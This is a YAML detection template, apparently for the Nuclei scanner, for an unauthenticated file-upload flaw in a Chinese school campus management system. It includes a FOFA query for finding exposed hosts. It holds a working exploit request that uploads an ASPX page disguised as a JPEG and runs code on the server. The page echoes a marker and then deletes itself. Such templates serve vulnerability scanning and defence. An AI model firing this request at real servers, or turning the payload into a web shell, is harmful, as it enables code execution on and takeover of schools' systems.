http:
    - extractors:
        - group: 1
          internal: true
          name: uploadfile
          part: body
          regex:
            - (\w+\d.+?\.aspx)
          type: regex
      raw:
        - |
          POST /PSE/Upload HTTP/1.1
          Host: {{Hostname}}
          Content-Type: multipart/form-data; boundary=00content0boundary00

          --00content0boundary00
          Content-Disposition: form-data; name="file"; filename="test.aspx"
          Content-Type: image/jpg

          <%@Page Language="C#"%><%Response.Write("pboyjnnrfipmplsukdeczudsefxmywe");System.IO.File.Delete(Request.PhysicalPath);%>
          --00content0boundary00--
    - matchers:
        - part: body
          type: word
          words:
            - pboyjnnrfipmplsukdeczudsefxmywe
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /Upload/PrimarySchoolEnrollment/{{uploadfile}} HTTP/1.1
          Host: {{Hostname}}
id: zhongxiaoxuezhihui-PSE_Upload-File-upload
info:
    author: Superhero
    description: |-
        fofa: body="/Login/IndexMobi"
        中小学智慧校园信息管理系统 /PSE/Upload 接口处存在任意文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 中小学智慧校园信息管理系统 /PSE/Upload 文件上传漏洞
    reference:
        - https://blog.csdn.net/m0_60571842/article/details/140611357
    severity: high
    tags: []
